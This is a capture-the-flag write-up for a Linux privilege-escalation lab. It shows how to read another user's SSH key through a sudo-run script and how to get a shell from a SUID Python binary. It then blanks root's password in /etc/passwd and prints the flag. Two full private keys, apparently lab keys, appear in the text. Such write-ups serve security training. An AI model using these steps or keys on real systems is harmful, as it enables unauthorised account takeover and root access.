AUCHALL - [Privesc] - Chain

You,AUCHALLPrivesc
Back

Challenge Description

It's time you learnt about horizontal and vertical privesc. Use cy243l:cy243l as your creds.

Solution

lets start with ssh

ssh [email protected] -p PORT

Password: cy243l

Alt text

On decoding the base64 output we got database credentials

nadeem.sh

#!/bin/bash
 
echo "I am `whoami`. But I am really Ashfaq Nadeem."

I modified whoami to cat /home/nadeem/.ssh/id_rsa

nadeem.sh after modification

#!/bin/bash
 
echo "I am `cat /home/nadeem/.ssh/id_rsa`. But I am really Ashfaq Nadeem."

Now run the following command to it as nadeem user

sudo -u nadeem /opt/nadeem.sh

we would get id_rsa of nadeem user

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Now save it in your local machine as id_rsa1 in seperate folder

Change permissions of id_rsa1

$ chmod 600 id_rsa1

Get shell as nadeem user by executing following command

ssh -i id_rsa1 [email protected] -p PORT

Now check for suid binaries

find / -perm /4000 2>/dev/null -exec ls -l {} \;

Alt text

bajwa is the owner of the file (user).
nadeem is the group owner of the file.

owner's permission field (-rwsr-s---), it will be executed with the effective user ID of the file owner (bajwa in this case) instead of the user of group nadeem who initiated the command.

/usr/bin/python3.8 -c 'import os; os.execl("/bin/bash", "bash", "-p")'

Alt text

Now save this as id_rsa2 in your local machine for bajwa user

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Change permission for this file

chmod 600 id_rsa2

Get shell as bajwa user by executing following command

ssh -i id_rsa2 [email protected] -p PORT

Alt text

Now we can write /etc/passwd as bajwa user

Simple change

root:x:0:0:root:/root:/bin/bash

to

root::0:0:root:/root:/bin/bash

x in previous root entry shows that the encrypted password is stored in the /etc/shadow file. So we removed it which shows that no password is set for the user.

Final /etc/passwd

Alt text

Get root by executing following command

su -

or su root

Alt text

Flag

Flag is dynamic

CY243L{h0r1z0nt4l_4nd_v3r71c4l_pr1veSc_2A398ea_UXSS_iNkX}

Writeups 2023 © RootxRAN.